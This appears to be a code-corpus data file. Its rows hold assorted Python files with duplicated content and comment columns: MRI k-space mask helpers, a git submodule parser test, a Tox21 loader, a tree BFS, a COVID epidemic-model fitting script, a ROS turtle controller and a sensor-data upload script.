def cine_cartesian_mask(shape,acc_factor,mode='numpy'):
"""
create a binary mask for a 2d cine MR image sequence:
N.B. for numpy, the binary mask is only real-valued, but this suffices
        as when computing the product of a complex-valued array with a real-valued
one, the output is complex-valued. This is because, for \mathbb{C}, the one-element
is given by 1=1+0*j.
In contrast, for pytorch, where complex-valued arrays are stored as two-channeled
        signals, the mask has to replicate the support of the indices for both channels
"""
nx,ny,nt = shape
mask = np.zeros(shape)
for kt in range(nt):
mask[:,:,kt] = cartesian_mask((nx,ny),acc_factor)
if mode=='pytorch':
mask = ifftshift(mask,axes=[0,1])
mask = (1+1j)*mask #has shape (nx,ny,nt)
#make a torch-tensor of shape (1,2,nx,ny,nt) out of it
mask = cplx_np2torch(mask, 0).unsqueeze(0)
return mask
def load_data(Ids):
"""
function for loading the image data of patients indexed by the set
Ids and stack all different slices to have (N,Nx,Ny,Nt), where
N is the total number of cine MR images.
"""
    #initialize list of images
pats_list = []
for pid in Ids:
#load image
img = np.load('data/np_arrays/xf_pat{}.npy'.format(pid))
img = np.moveaxis(img,(0,1,2,3),(1,2,0,3))
pats_list.append(img)
print(img.shape)
xf = np.concatenate(pats_list,axis=0)
return xf
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
A collection of auxiliary functions for manipulating data.
"""
import numpy as np
import torch
from numpy.lib.stride_tricks import as_strided
from numpy.fft import ifftshift
import sys
sys.path.append('../')
def random_phase(img):
"""
function for generating a random phase-profile
"""
#get shape of in-plane image
Nx,Ny = img.shape[:2]
x = np.linspace(-np.pi, np.pi, Nx)
y = np.linspace(-np.pi, np.pi, Ny)
#generate parameters to create a random phase profile with values
xx, yy = np.meshgrid(x, y)
a, b,c,d,e = np.random.random(5)
z = a*np.sin(b*xx-c) + (1-a)*np.cos(d*yy-e)
#bring to [-np.pi, np.pi]
z = (np.pi- (-np.pi))*(z-np.min(z))/(np.max(z)-np.min(z)) + (-np.pi)
return z
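# Example: attach a synthetic phase map to a magnitude image
#   img = np.abs(np.random.randn(64, 64))
#   cplx_img = img * np.exp(1j * random_phase(img))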
def cplx_np2torch(x,dim):
"""
    function for converting a complex-valued np.array x
to a complex-valued torch-tensor, where the 2 channels
for the real and imaginary parts are inserted as "dim" dimension
"""
x = torch.stack([torch.tensor(np.real(x)),torch.tensor(np.imag(x))],dim=dim)
return x
def cplx_torch2np(x,dim):
"""
    function for converting a complex-valued torch tensor to a complex-valued numpy array
    the parameter "dim" indicates which dimension is used to store the real
    and the imaginary part in the torch-tensor
    first, the tensor is transposed, such that we can access the real and the imaginary parts
the output is a complex-valued numpy array where the dimension "dim" is dropped
"""
#permutes the axis "dim" and 0
    #now, the 0-th axis contains the real and imaginary parts
x = torch.transpose(x,dim,0)
if x.is_cuda:
x = x.cpu()
    #get the real and imaginary parts
xr = x[0,...].numpy()
xi = x[1,...].numpy()
x = xr+1j*xi
#expand dimensions in order to be able to get back to original shape
x = np.expand_dims(x,axis=0)
x = np.swapaxes(x,0,dim)
#drop the dimension "dim"
x = np.squeeze(x,axis=dim)
return x
def random_mask(img, acc_factor=4):
"""
    function for generating a random binary mask.
For each time point, the mask is different for incoherent undersampling.
"""
def normal_pdf(length, sensitivity):
return np.exp(-sensitivity * (np.arange(length) - length / 2)**2)
def cartesian_mask(shape, acc, sample_n=10):
"""
Sampling density estimated from implementation of kt FOCUSS
shape: tuple - of form (..., nx, ny)
acc: float - doesn't have to be integer 4, 8, etc..
Note:
function borrowed from <NAME> from
https://github.com/js3611/Deep-MRI-Reconstruction/blob/master/utils/compressed_sensing.py
"""
N, Nx, Ny = int(np.prod(shape[:-2])), shape[-2], shape[-1]
pdf_x = normal_pdf(Nx, 0.5/(Nx/10.)**2)
lmda = Nx/(2.*acc)
n_lines = int(Nx / acc)
# add uniform distribution
pdf_x += lmda * 1./Nx
if sample_n:
pdf_x[Nx//2-sample_n//2:Nx//2+sample_n//2] = 0
pdf_x /= np.sum(pdf_x)
n_lines -= sample_n
mask = np.zeros((N, Nx))
for i in range(N):
idx = np.random.choice(Nx, n_lines, False, pdf_x)
mask[i, idx] = 1
if sample_n:
mask[:, Nx//2-sample_n//2:Nx//2+sample_n//2] = 1
size = mask.itemsize
mask = as_strided(mask, (N, Nx, Ny), (size * Nx, size, 0))
mask = mask.reshape(shape)
return mask
def cine_cartesian_mask(shape,acc_factor,mode='numpy'):
"""
create a binary mask for a 2d cine MR image sequence:
N.B. for numpy, the binary mask is only real-valued, but this suffices
        as when computing the product of a complex-valued array with a real-valued
one, the output is complex-valued. This is because, for \mathbb{C}, the one-element
is given by 1=1+0*j.
In contrast, for pytorch, where complex-valued arrays are stored as two-channeled
        signals, the mask has to replicate the support of the indices for both channels
"""
nx,ny,nt = shape
mask = np.zeros(shape)
for kt in range(nt):
mask[:,:,kt] = cartesian_mask((nx,ny),acc_factor)
if mode=='pytorch':
mask = ifftshift(mask,axes=[0,1])
mask = (1+1j)*mask #has shape (nx,ny,nt)
#make a torch-tensor of shape (1,2,nx,ny,nt) out of it
mask = cplx_np2torch(mask, 0).unsqueeze(0)
return mask
def load_data(Ids):
"""
function for loading the image data of patients indexed by the set
Ids and stack all different slices to have (N,Nx,Ny,Nt), where
N is the total number of cine MR images.
"""
    #initialize list of images
pats_list = []
for pid in Ids:
#load image
img = np.load('data/np_arrays/xf_pat{}.npy'.format(pid))
img = np.moveaxis(img,(0,1,2,3),(1,2,0,3))
pats_list.append(img)
print(img.shape)
xf = np.concatenate(pats_list,axis=0)
return xf
| en | 0.844069 | #!/usr/bin/env python3 # -*- coding: utf-8 -*- A collection of auxiliary functions for manipulating data. function for generating a random phase-profile #get shape of in-plane image #generate parameters to create a random phase profile with values #bring to [-np.pi, np.pi] functon for converting a complex-valued np.array x to a complex-valued torch-tensor, where the 2 channels for the real and imaginary parts are inserted as "dim" dimension functon for converting a complex-valued torch-tensors to a complex-valued numpy array the parameter "dim" indicates which dimension is used to stre the real and the imaginary part in the torch-tensor first, the tensor is transposed, such that we can access te real and the imaginry parts the output is a complex-valued numpy array where the dimension "dim" is dropped #permutes the axis "dim" and 0 #now, the 0-th axis contains the real and imainary parts #get the real and imaginry parts #expand dimensions in order to be able to get back to original shape #drop the dimension "dim" function for generating a random binary massk. For each time point, the mask is different for incoherent undersampling. Sampling density estimated from implementation of kt FOCUSS shape: tuple - of form (..., nx, ny) acc: float - doesn't have to be integer 4, 8, etc.. Note: function borrowed from <NAME> from https://github.com/js3611/Deep-MRI-Reconstruction/blob/master/utils/compressed_sensing.py # add uniform distribution create a binary mask for a 2d cine MR image sequence: N.B. for numpy, the binary mask is only real-valued, but this suffices as when computing the product of a complex-valued array with a ral-valued one, the output is complex-valued. This is because, for \mathbb{C}, the one-element is given by 1=1+0*j. In contrast, for pytorch, where complex-valued arrays are stored as two-channeled signals, the mask has replicate the support of the indices for both channels #has shape (nx,ny,nt) #make a torch-tensor of shape (1,2,nx,ny,nt) out of it function for loading the image data of patients indexed by the set Ids and stack all different slices to have (N,Nx,Ny,Nt), where N is the total number of cine MR images. #initalize list of images #load image | 2.851647 | 3 |
tests/lib/bes/git/test_git_submodule_info.py | reconstruir/bes | 0 | 6616815 | <gh_stars>0
#!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
from bes.testing.unit_test import unit_test
from bes.git.git_submodule_info import git_submodule_info as SI
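# Inferred from the test cases below: SI.parse() returns a tuple of the form
# (name, ?, revision, ?, is_current, tag), and a leading '-' in the status
# line maps to is_current=False.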
class test_git_submodule_info(unit_test):
def test_parse_not_current(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, False, None ),
SI.parse('-1234567890abcdef1234567890abcdef12345678 sub1') )
def test_parse_current(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, True, None ),
SI.parse(' 1234567890abcdef1234567890abcdef12345678 sub1') )
def test_parse_not_current_with_tag(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, False, 'tag666' ),
SI.parse('-1234567890abcdef1234567890abcdef12345678 sub1 (tag666)') )
def test_parse_current_with_tag(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, True, 'tag666' ),
SI.parse(' 1234567890abcdef1234567890abcdef12345678 sub1 (tag666)') )
if __name__ == '__main__':
unit_test.main()
| #!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
from bes.testing.unit_test import unit_test
from bes.git.git_submodule_info import git_submodule_info as SI
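# Inferred from the test cases below: SI.parse() returns a tuple of the form
# (name, ?, revision, ?, is_current, tag), and a leading '-' in the status
# line maps to is_current=False.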
class test_git_submodule_info(unit_test):
def test_parse_not_current(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, False, None ),
SI.parse('-1234567890abcdef1234567890abcdef12345678 sub1') )
def test_parse_current(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, True, None ),
SI.parse(' 1234567890abcdef1234567890abcdef12345678 sub1') )
def test_parse_not_current_with_tag(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, False, 'tag666' ),
SI.parse('-1234567890abcdef1234567890abcdef12345678 sub1 (tag666)') )
def test_parse_current_with_tag(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, True, 'tag666' ),
SI.parse(' 1234567890abcdef1234567890abcdef12345678 sub1 (tag666)') )
if __name__ == '__main__':
unit_test.main() | en | 0.461035 | #!/usr/bin/env python #-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*- | 2.350033 | 2 |
universal_computation/datasets/tox21.py | alex-kj-chin/universal-computation | 0 | 6616816 | <filename>universal_computation/datasets/tox21.py
from universal_computation.datasets.dataset import Dataset
from torch_geometric.datasets import MoleculeNet
from torch_geometric.data import DataLoader
class Tox21Dataset(Dataset):
def __init__(self, batch_size, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data = MoleculeNet(root="data/tox21", name="Tox21")
self.data_size = len(self.data)
self.d_train = DataLoader(
self.data[:int(self.data_size * .8)], batch_size=batch_size, drop_last=True, shuffle=True,
)
self.d_test = DataLoader(
self.data[int(self.data_size * .8):], batch_size=batch_size, drop_last=True, shuffle=True,
)
self.train_enum = enumerate(self.d_train)
self.test_enum = enumerate(self.d_test)
def get_batch(self, batch_size=None, train=True):
if train:
_, (x, y) = next(self.train_enum, (None, (None, None)))
if x is None:
self.train_enum = enumerate(self.d_train)
_, (x, y) = next(self.train_enum)
else:
_, (x, y) = next(self.test_enum, (None, (None, None)))
if x is None:
self.test_enum = enumerate(self.d_test)
_, (x, y) = next(self.test_enum)
x = x.to(device=self.device)
y = y.to(device=self.device)
self._ind += 1
return x, y
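# Hypothetical usage (device and _ind handling are assumed to come from the
# Dataset base class):
#   ds = Tox21Dataset(batch_size=32)
#   graphs, labels = ds.get_batch(train=True)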
| from universal_computation.datasets.dataset import Dataset
from torch_geometric.datasets import MoleculeNet
from torch_geometric.data import DataLoader
class Tox21Dataset(Dataset):
def __init__(self, batch_size, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data = MoleculeNet(root="data/tox21", name="Tox21")
self.data_size = len(self.data)
self.d_train = DataLoader(
self.data[:int(self.data_size * .8)], batch_size=batch_size, drop_last=True, shuffle=True,
)
self.d_test = DataLoader(
self.data[int(self.data_size * .8):], batch_size=batch_size, drop_last=True, shuffle=True,
)
self.train_enum = enumerate(self.d_train)
self.test_enum = enumerate(self.d_test)
def get_batch(self, batch_size=None, train=True):
if train:
_, (x, y) = next(self.train_enum, (None, (None, None)))
if x is None:
self.train_enum = enumerate(self.d_train)
_, (x, y) = next(self.train_enum)
else:
_, (x, y) = next(self.test_enum, (None, (None, None)))
if x is None:
self.test_enum = enumerate(self.d_test)
_, (x, y) = next(self.test_enum)
x = x.to(device=self.device)
y = y.to(device=self.device)
self._ind += 1
return x, y
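# Hypothetical usage (device and _ind handling are assumed to come from the
# Dataset base class):
#   ds = Tox21Dataset(batch_size=32)
#   graphs, labels = ds.get_batch(train=True)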
| none | 1 | 2.17759 | 2 | |
027-tree_bfs.py | lzit/python-100 | 39 | 6616817 | from bst import Bst
from collections import deque
class BstBfs(Bst):
def bfs(self, visit_func):
if self.root is None:
raise TypeError('root is None')
queue = deque()
queue.append(self.root)
while queue:
node = queue.popleft()
visit_func(node)
if node.left is not None:
queue.append(node.left)
if node.right is not None:
queue.append(node.right) | from bst import Bst
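# Usage: tree.bfs(print) visits the nodes level by level, left to right,
# and raises TypeError when the tree has no root.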
from collections import deque
class BstBfs(Bst):
def bfs(self, visit_func):
if self.root is None:
raise TypeError('root is None')
queue = deque()
queue.append(self.root)
while queue:
node = queue.popleft()
visit_func(node)
if node.left is not None:
queue.append(node.left)
if node.right is not None:
queue.append(node.right) | none | 1 | 3.452847 | 3 | |
clipper_admin/clipper_admin/metrics/__init__.py | DNCoelho/clipper | 1,403 | 6616818 | from __future__ import absolute_import
from ..version import __version__
from .client import add_metric, report_metric
from . import server
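# Side effect on import: make sure the Redis-backed metrics daemon is running.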
if not server.redis_daemon_exist():
server.start_redis_daemon()
| from __future__ import absolute_import
from ..version import __version__
from .client import add_metric, report_metric
from . import server
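# Side effect on import: make sure the Redis-backed metrics daemon is running.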
if not server.redis_daemon_exist():
server.start_redis_daemon()
| none | 1 | 1.366785 | 1 | |
jupyter.py | takacsistvan01010101/OCR_API | 0 | 6616819 | # load mnist data
from tensorflow.python.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
#####################################################################################
# display an image from mnist
import matplotlib.pyplot as plt
i = 2
plt.imshow(x_train[i])
print (y_train[i])
print(x_train[i].shape)
#####################################################################################
# upload and save file
from google.colab import files
uploaded = files.upload()
for fn in uploaded.keys():
print('User uploaded file "{name}" with length {length} bytes'.format(
name=fn, length=len(uploaded[fn])))
filename = 'test1.png'
with open(filename, 'wb') as f:  # uploaded values are bytes, so write in binary mode
    f.write(uploaded[filename])
#####################################################################################
# load and display image
from PIL import Image
x = Image.open('test1.png')
import matplotlib.pyplot as plt
plt.imshow(x) | # load mnist data
from tensorflow.python.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
#####################################################################################
# display an image from mnist
import matplotlib.pyplot as plt
i = 2
plt.imshow(x_train[i])
print (y_train[i])
print(x_train[i].shape)
#####################################################################################
# upload and save file
from google.colab import files
uploaded = files.upload()
for fn in uploaded.keys():
print('User uploaded file "{name}" with length {length} bytes'.format(
name=fn, length=len(uploaded[fn])))
filename = 'test1.png'
with open(filename, 'wb') as f:  # uploaded values are bytes, so write in binary mode
    f.write(uploaded[filename])
#####################################################################################
# load and display image
from PIL import Image
x = Image.open('test1.png')
import matplotlib.pyplot as plt
plt.imshow(x) | de | 0.766857 | # load mnist data ##################################################################################### # display an image from mnist ##################################################################################### # upload and save file ##################################################################################### # load and display image | 3.42155 | 3 |
Comparison.py | layjain/BRD-21 | 0 | 6616820 | from CoronaVIRES_1 import CoronaVIRES_1
from SEIR_1 import SEIR_Baseline
from scipy.optimize import curve_fit
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from operator import itemgetter
from utils import *
TAU = 0.9
np.seterr("raise")
owid_df = pd.read_csv("owid/owid-covid-data-new.csv")
"""
Get the top few countries
"""
country_to_vaccination_days_count = {}
for country_location in owid_df["location"].unique():
# country_location = "United States"
owid_country=owid_df.loc[owid_df['location']==country_location]
count = owid_country["total_vaccinations"].dropna().count()
country_to_vaccination_days_count[country_location] = count
# See top 10 countries data we have data for
top_few = dict(sorted(country_to_vaccination_days_count.items(), key=itemgetter(1), reverse=True)[:10])
results_df = pd.DataFrame()
results_df["Errors/Countries"] = ["CoronaVIRES","SEIRV"]
for country_location in list(top_few)+["United States"]:
#Baseline Model cannot fit this to the desired accuracy and runs out of function calls
if country_location in []:
continue
# Example: country_location = "Italy"
owid_country = owid_df.loc[owid_df['location']==country_location]
    # Filter relevant dates since vaccinations started (is not NaN)
owid_country = owid_country[owid_country.total_vaccinations.notnull()]
#Series to Predict
N = list(owid_country["population"])[0]
_deaths = list(owid_country.total_deaths)
deaths = [e-_deaths[0] for e in _deaths]
deaths = [death*1/N for death in deaths] # standardize the deaths
train_deaths = deaths[:int(TAU*len(deaths))]
_dates = list(owid_country.date)
dates = [date_difference(e, _dates[0]) for e in _dates]
train_dates = dates[:int(TAU*len(deaths))]
N = 1
# Models
model_1 = CoronaVIRES_1(N)
model_base = SEIR_Baseline(N)
print(country_location)
def f2(t,alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0):
predicted_deaths = model_1.predict_Deaths_for_T_days(int(max(t)), alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0)
ret = []
for time in t:
ret.append(predicted_deaths[int(time)])
return ret
# alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0
lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//2,N//10000,N//10000]
# lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//3,N//100000,N//100000]
# alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0
# upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10]
upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N]
opt = curve_fit(f2, dates, deaths, bounds = (lower_bounds,upper_bounds))
def f1_base(t,alpha, beta, chi, dels, rho, theta, S0, Es0, Is0):
ret = []
for T in t:
death_T = model_base.predict_Deaths(int(T), alpha, beta, chi, dels, rho, theta, S0, Es0, Is0)
ret.append(death_T)
return ret
lower_bounds_base = [0, 0, 0, 0, 0, 0, N//3, N//100000,N//100000]
# alpha, beta, chi, dels, rho, theta, S0, Es0, Is0
# upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10]
upper_bounds_base = [1, 0.5, 1, 0.1, 0.1, 0.5, N, N, N]
opt_base = curve_fit(f1_base, dates, deaths, bounds = (lower_bounds_base,upper_bounds_base))
#Plot
alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0 = opt[0]
alpha_base, beta_base, chi_base, dels_base, rho_base, theta_base, S0_base, Es0_base, Is0_base = opt_base[0]
model_final_1 = CoronaVIRES_1(N)
T = max(dates)
model_final_1.run_predict(T, alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0)
model_base_final = SEIR_Baseline(N)
model_base_final.run_predict(T, alpha_base, beta_base, chi_base, dels_base, rho_base, theta_base, S0_base, Es0_base, Is0_base)
print("Fitting Done,Plotting")
coronavires_e, base_e = calculate_errors(deaths,train_deaths,predicted_deaths = [model_final_1.D[i] for i in dates],predicted_deaths_base = [model_base_final.D[i] for i in dates])
results_df[country_location] = [coronavires_e, base_e]
plt.scatter(dates, [model_final_1.D[i] for i in dates], label = "CoronaVIRES", marker='.')
plt.scatter(dates, [model_base_final.D[i] for i in dates], label = "SEIR Baseline", marker='.')
plt.scatter(dates, deaths, label="Deaths Actual", marker='.')
# old_ticks = plt.xticks()
# plt.xticks(list(old_ticks[0])+[train_dates[-1]], old_ticks[1]+['End of Training data'])
plt.axvline(x=train_dates[-1], ymin=0, ymax=1, linestyle = "dashed")
# plt.scatter(owid_country.date, owid_country.total_vaccinations, label="Total Vaccinations")
plt.title(country_location)
plt.legend()
plt.xlabel("Days")
plt.ylabel("Death Counts(Normalized)")
plt.savefig("figures/Comparison_{}.png".format(country_location))
plt.show()
results_df.to_csv("Comparison.csv") | from CoronaVIRES_1 import CoronaVIRES_1
from SEIR_1 import SEIR_Baseline
from scipy.optimize import curve_fit
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from operator import itemgetter
from utils import *
TAU = 0.9
np.seterr("raise")
owid_df = pd.read_csv("owid/owid-covid-data-new.csv")
"""
Get the top few countries
"""
country_to_vaccination_days_count = {}
for country_location in owid_df["location"].unique():
# country_location = "United States"
owid_country=owid_df.loc[owid_df['location']==country_location]
count = owid_country["total_vaccinations"].dropna().count()
country_to_vaccination_days_count[country_location] = count
# See top 10 countries data we have data for
top_few = dict(sorted(country_to_vaccination_days_count.items(), key=itemgetter(1), reverse=True)[:10])
results_df = pd.DataFrame()
results_df["Errors/Countries"] = ["CoronaVIRES","SEIRV"]
for country_location in list(top_few)+["United States"]:
#Baseline Model cannot fit this to the desired accuracy and runs out of function calls
if country_location in []:
continue
# Example: country_location = "Italy"
owid_country = owid_df.loc[owid_df['location']==country_location]
    # Filter relevant dates since vaccinations started (is not NaN)
owid_country = owid_country[owid_country.total_vaccinations.notnull()]
#Series to Predict
N = list(owid_country["population"])[0]
_deaths = list(owid_country.total_deaths)
deaths = [e-_deaths[0] for e in _deaths]
deaths = [death*1/N for death in deaths] # standardize the deaths
train_deaths = deaths[:int(TAU*len(deaths))]
_dates = list(owid_country.date)
dates = [date_difference(e, _dates[0]) for e in _dates]
train_dates = dates[:int(TAU*len(deaths))]
N = 1
# Models
model_1 = CoronaVIRES_1(N)
model_base = SEIR_Baseline(N)
print(country_location)
def f2(t,alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0):
predicted_deaths = model_1.predict_Deaths_for_T_days(int(max(t)), alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0)
ret = []
for time in t:
ret.append(predicted_deaths[int(time)])
return ret
# alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0
lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//2,N//10000,N//10000]
# lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//3,N//100000,N//100000]
# alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0
# upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10]
upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N]
opt = curve_fit(f2, dates, deaths, bounds = (lower_bounds,upper_bounds))
def f1_base(t,alpha, beta, chi, dels, rho, theta, S0, Es0, Is0):
ret = []
for T in t:
death_T = model_base.predict_Deaths(int(T), alpha, beta, chi, dels, rho, theta, S0, Es0, Is0)
ret.append(death_T)
return ret
lower_bounds_base = [0, 0, 0, 0, 0, 0, N//3, N//100000,N//100000]
# alpha, beta, chi, dels, rho, theta, S0, Es0, Is0
# upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10]
upper_bounds_base = [1, 0.5, 1, 0.1, 0.1, 0.5, N, N, N]
opt_base = curve_fit(f1_base, dates, deaths, bounds = (lower_bounds_base,upper_bounds_base))
#Plot
alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0 = opt[0]
alpha_base, beta_base, chi_base, dels_base, rho_base, theta_base, S0_base, Es0_base, Is0_base = opt_base[0]
model_final_1 = CoronaVIRES_1(N)
T = max(dates)
model_final_1.run_predict(T, alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0)
model_base_final = SEIR_Baseline(N)
model_base_final.run_predict(T, alpha_base, beta_base, chi_base, dels_base, rho_base, theta_base, S0_base, Es0_base, Is0_base)
print("Fitting Done,Plotting")
coronavires_e, base_e = calculate_errors(deaths,train_deaths,predicted_deaths = [model_final_1.D[i] for i in dates],predicted_deaths_base = [model_base_final.D[i] for i in dates])
results_df[country_location] = [coronavires_e, base_e]
plt.scatter(dates, [model_final_1.D[i] for i in dates], label = "CoronaVIRES", marker='.')
plt.scatter(dates, [model_base_final.D[i] for i in dates], label = "SEIR Baseline", marker='.')
plt.scatter(dates, deaths, label="Deaths Actual", marker='.')
# old_ticks = plt.xticks()
# plt.xticks(list(old_ticks[0])+[train_dates[-1]], old_ticks[1]+['End of Training data'])
plt.axvline(x=train_dates[-1], ymin=0, ymax=1, linestyle = "dashed")
# plt.scatter(owid_country.date, owid_country.total_vaccinations, label="Total Vaccinations")
plt.title(country_location)
plt.legend()
plt.xlabel("Days")
plt.ylabel("Death Counts(Normalized)")
plt.savefig("figures/Comparison_{}.png".format(country_location))
plt.show()
results_df.to_csv("Comparison.csv") | en | 0.660033 | Get the top few countries # country_location = "United States" # See top 10 countries data we have data for #Baseline Model cannot fit this to the desired accuracy and runs out of function calls # Example: country_location = "Italy" # Filter relavant dates since vaccinations started (is Not NAN) #Series to Predict # standardize the deaths # Models # alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0 # lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//3,N//100000,N//100000] # alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0 # upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10] # alpha, beta, chi, dels, rho, theta, S0, Es0, Is0 # upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10] #Plot # old_ticks = plt.xticks() # plt.xticks(list(old_ticks[0])+[train_dates[-1]], old_ticks[1]+['End of Training data']) # plt.scatter(owid_country.date, owid_country.total_vaccinations, label="Total Vaccinations") | 2.929884 | 3 |
week1/publisher.py | vietanhtran2710/ROS-UET | 0 | 6616821 | <filename>week1/publisher.py
import rospy
from geometry_msgs.msg import Twist
from math import pi
def turn_left():
print("Turning left (Spin 90 degrees - Pi radian)")
publish_velocity(0, pi / 2)
rate = rospy.Rate(1)
rate.sleep()
def move_forward(distance):
print("Moving forward " + str(distance) + "m")
publish_velocity(distance, 0)
rate = rospy.Rate(1)
rate.sleep()
def publish_velocity(linear_x, angular_z):
while publisher.get_num_connections() < 1:
pass
move_message = Twist()
move_message.linear.y = move_message.linear.z = 0.0
move_message.angular.z = move_message.angular.y = 0.0
move_message.linear.x = linear_x
move_message.angular.z = angular_z
publisher.publish(move_message)
rospy.init_node("controller", anonymous=False)
publisher = rospy.Publisher("turtle1/cmd_vel", Twist, queue_size=10000)
while publisher.get_num_connections() < 1:
pass
for i in range(4):
move_forward(2)
turn_left()
| <filename>week1/publisher.py
import rospy
from geometry_msgs.msg import Twist
from math import pi
def turn_left():
print("Turning left (Spin 90 degrees - Pi radian)")
publish_velocity(0, pi / 2)
rate = rospy.Rate(1)
rate.sleep()
def move_forward(distance):
print("Moving forward " + str(distance) + "m")
publish_velocity(distance, 0)
rate = rospy.Rate(1)
rate.sleep()
def publish_velocity(linear_x, angular_z):
while publisher.get_num_connections() < 1:
pass
move_message = Twist()
move_message.linear.y = move_message.linear.z = 0.0
move_message.angular.z = move_message.angular.y = 0.0
move_message.linear.x = linear_x
move_message.angular.z = angular_z
publisher.publish(move_message)
rospy.init_node("controller", anonymous=False)
publisher = rospy.Publisher("turtle1/cmd_vel", Twist, queue_size=10000)
while publisher.get_num_connections() < 1:
pass
for i in range(4):
move_forward(2)
turn_left()
| none | 1 | 3.225209 | 3 | |
tcc_rpi/enviarDados.py | MegaNo0body/tcc | 1 | 6616822 | import urllib.request
import urllib.parse
from os import listdir
from os.path import isfile, join
# Read the sensor ID from the idSensor file
f = open('idSensor', 'r')
idSensor = f.read().strip()
f.close()
# Build the URL for the POST request
url = 'http://fernando.local:8081/tcc/sensor/' + idSensor + '/inserir'
# url = 'http://192.168.1.101:8081/tcc/sensor/' + idSensor + '/inserir'
# Directory the data files are read from
diretorio = 'dados'
# Values are collected into a dictionary that will be sent to the service
valores = {}
# Collect the values from the files in the ./dados folder
# Each file name is used as the data type; its content is used as the value.
for nome in listdir(diretorio):
    # Join the directory with the file name
arquivo = join(diretorio, nome)
    # Check whether the entry is a file
if isfile(arquivo):
        # Read the value from the file
f = open(arquivo, 'r')
valor = f.read().strip()
f.close()
        # Add the new value to the values dictionary
valores[nome] = valor
print('POST %s\n%s' % (url, str(valores)))
# POST the data to the service
data = urllib.parse.urlencode(valores).encode('utf-8')
urllib.request.urlopen(url, data)
| import urllib.request
import urllib.parse
from os import listdir
from os.path import isfile, join
# Read the sensor ID from the idSensor file
f = open('idSensor', 'r')
idSensor = f.read().strip()
f.close()
# Build the URL for the POST request
url = 'http://fernando.local:8081/tcc/sensor/' + idSensor + '/inserir'
# url = 'http://192.168.1.101:8081/tcc/sensor/' + idSensor + '/inserir'
# Directory the data files are read from
diretorio = 'dados'
# Values are collected into a dictionary that will be sent to the service
valores = {}
# Collect the values from the files in the ./dados folder
# Each file name is used as the data type; its content is used as the value.
for nome in listdir(diretorio):
    # Join the directory with the file name
arquivo = join(diretorio, nome)
    # Check whether the entry is a file
if isfile(arquivo):
        # Read the value from the file
f = open(arquivo, 'r')
valor = f.read().strip()
f.close()
        # Add the new value to the values dictionary
valores[nome] = valor
print('POST %s\n%s' % (url, str(valores)))
# POST the data to the service
data = urllib.parse.urlencode(valores).encode('utf-8')
urllib.request.urlopen(url, data)
| pt | 0.809967 | # Coleta o ID do sensor lendo o arquivo idSensor # Cria a URL para a postagem # url = 'http://192.168.1.101:8081/tcc/sensor/' + idSensor + '/inserir' # Define o diretorio de leitura dos dados # Os valores sao adicionados a um dicionario, que sera enviado ao servico # Pegar os valores dos arquivos na pasta ./dados # O nome de cada arquivo sera usado como o tipo do dado, o conteudo sera usado como valor. # Junta o nome do arquivo com o diretorio # Verifica se nome 'e um arquivo # Le o valor do arquivo # Adiciona o novo valor para o dicionario de valores # Faz a postagem para o servico | 3.224416 | 3 |
